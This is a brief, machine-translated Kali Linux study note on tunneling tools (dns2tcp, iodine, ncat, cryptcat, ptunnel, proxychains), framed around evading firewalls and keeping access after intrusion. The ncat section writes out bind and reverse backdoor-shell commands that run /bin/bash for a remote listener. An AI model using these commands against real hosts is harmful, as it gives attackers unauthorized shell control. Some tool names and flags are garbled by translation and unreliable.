2016.6.17 Kali Linux Tunneling Tools

Basic concepts of tunneling tools:

1. In a computer network, a tunneling tool is a technique that uses a network protocol to encapsulate another network protocol.

2. Usually used for data camouflage or through the firewall, after the intrusion target system, can be used to improve permissions and permissions to maintain.

Introduction to Tunneling tools in Kali:

(1) dns2tcp

* * is an encapsulation tool that encapsulates TCP packets into DNS protocol packets, and is suitable for networks where the target host can only send DNS requests;

* * Client: DNS2TCPC

* * Service side: DNS2TCPD

* * Cons: Need to have their own domain name, configure DNS

(2) Iodline

* * More powerful than DNS2TCP, more support protocols.

(3) Ncat/netcat

**ncat is an improved version of the NETCAT program, powerful;

* * Clients that can be used for Web service programs and other TCP/IP protocols;

* * Simple TCP/UDP/SCTP/SSL service-side program;

* * Forwarding agent TCP/UDP/SCTP traffic;

* * Network gateway to execute system directives;

* * Encrypt communication data using SSL;

* * as a connection agent;

(4) Ncat

* * Create a forward connection back door shell

* * Create reverse connection back door shell

* * Forward connection (target machine in public network, and we ourselves in LAN):

Terminal input: ncat-l 1337-e/bin/bash//-l parameter is listen listen 1337 Port-e parameter is to execute shell in bash directory

Connect on target host (192.168.1.103): Ncat 192.168.1.104 1337//104 is server-side address

After the connection, you have permission to manipulate the shell of the target host.

* * Reverse connection (target host in LAN, and we have public IP)

* * or we and the target host are in their respective intranet, then generally do bounce connection, bounce to our side of the gateway or router IP address because they have a public IP, and then we need to do on the router or gateway to specify port mapping to the intranet host:

In the attack host terminal input: Ncat-l 1337//Start monitoring 1337 port just fine

In the target host terminal input: NCAT 192.168.1.104-e/bin/bash//Specify the IP address of the bounce (that is, the IP address of the listener), the-e parameter specifies the shell that the listener can enable after a bounce connection

(5) Cryptcat

**cryptcat is the Classic Network tool netcat encryption version, using twoflish encryption algorithm, its key negotiation process based on send, receive a double share of a password

**-k Specifying a password

The **-h parameter can be seen using the parameter-l specified as the listening mode-p to specify the listening port-s to specify the listening IP address

(6) ICMP tunneling tool Ptunnel

* * Tunneling tools that use ICMP encapsulation TCP connections

* * Server side: Ptunnel

* * Client: Ptunnel-p 192.168.1.104 (server-side address)-lp 4567 (server local port)-da 192.168.1.103 (target host)-DP 22 (destination host port)

When the **SSH command accesses the 192.168.1.103 host, port forwarding causes the command to forward to Port 4567 on 192.168.1.104 and then forward to Port 22 on the 192.168.1.103

(7) Creating a tunnel from a proxy server

* * Build SOCKS5 proxy server.

* * Build tunnels through agents.

(8) Proxychains Tools

* * For access to external networks through a proxy server;

* * Firewall through the outer port;

* * Make up the chain of proxy server;

* * Use the proxy for external links to apps that do not have a proxy feature. Telnet. Ftp. Wget. such as

2016.6.17 Kali Linux Tunneling Tools